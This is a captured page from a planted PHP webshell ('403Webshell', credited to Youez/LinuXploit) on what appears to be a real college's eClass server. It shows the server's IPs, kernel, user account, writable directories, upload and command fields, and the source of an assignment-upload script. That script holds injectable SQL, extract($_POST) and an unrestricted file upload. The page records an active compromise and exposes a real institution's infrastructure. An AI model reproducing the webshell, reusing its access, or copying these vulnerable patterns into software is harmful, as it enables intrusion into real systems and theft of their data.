403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.50.62
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eClass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eClass/new_assignment_process.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 2016-03-24
 * Time: 06:01 PM
 */
session_start();
extract($_POST);
$staffID=$_SESSION['staffID'];
//if($password==$password2) {


    require('../connect.php');
    $db = db_connect();

    $material = $_FILES['user_file1'];
    $folder = "image/";
    $material_name = $_FILES['user_file1']['name'];
$fileT=explode('.',$material_name);
    $material_type = $_FILES['user_file1']['type'];
    $material_tmp = $_FILES['user_file1']['tmp_name'];
    $material_size = $_FILES['user_file1']['size'];
    $old = $_FILES['user_file1']['tmp_name'];
//    $staffID_pic = str_replace("/", "", $courseID);
     $new = "course_assignment/1_" .$courseID.".".$fileT[1] ;
//echo filetype($new);


 $file_check="select * from uploading_tb where courseID='$courseID' and mode=2";
$file_check=$db->query($file_check);
    $file_count=$file_check->rowCount();
$file_count+=1;
if ($file_count>0){
    $new_filename="course_assignment/2_" .$courseID."_".$file_count.".".$fileT[1];
}else{
    $new_filename="course_assignment/2_" .$courseID."_1.".$fileT[1];
}
//echo $new_filename;
 if (file_exists($new_filename)) {
     echo
     "<script>alert('Record Already Exist')</script>
     header('location:' . 'new_assignment.php?id=1')";
 }else {



//    $new = "course_material/" . $courseID . ".jpg";
//     echo $new_filename;
//     die();
     move_uploaded_file($old, $new_filename);
$d_time=date("Y-m-d H:i:s");

//     echo $result_insert = "INSERT INTO `uploading_tb` (`sn`, `courseID`, `filename`, `filetype`, `mode`, `timeFrom`, `timeTo`, `staffID`, `timeUnpload`, `timeRemoved`, `status`) VALUES (NULL,'$courseID', '$new_filename', '0', 1, '$d_time', '$d_time', '$staffID', '$d_time', '$d_time', 1)";
     $result_insert = "INSERT INTO `uploading_tb` (`sn`, `courseID`, `filename`, `filetype`, `mode`, `timeFrom`, `timeTo`, `staffID`, `timeUnpload`, `timeRemoved`, `status`) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)";
     $result_insert_p = $db->prepare($result_insert);
     $result_insert_p->execute([$courseID, $new_filename, $fileT[1], 2, $d_time, $deadline, $staffID, $d_time, $d_time, 1]);

//die();
     //======================mailer======================
     $query="SELECT * FROM coursepool where sn='$courseID'";
     $rs=$db->query($query);
      $count=$rs->rowCount();
     $rs_fetch=$rs->fetch(PDO::FETCH_BOTH);
      $rs_levelID=$rs_fetch['levelID'];
      $rs_courseCode=$rs_fetch['courseCode'];
      $rs_semester=$rs_fetch['semester'];
      $rs_dept=$rs_fetch['dept'];
//     die();
$lec="select * from staff_biodata where staffID='$staffID'";
$lect=$db->query($lec);
      $lect->rowCount();
if ($lect->rowCount()>0){
     $lectu=$lect->fetch(PDO::FETCH_BOTH);
     $lecturer=$lectu['fullname'];
     $type='Assignment';
    $courseCode=$rs_fetch['courseCode'];
    require_once('sendMail.php');

}


//=============================================END MAILER=============


     header('location:' . 'new_assignment.php?id=2');
 }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit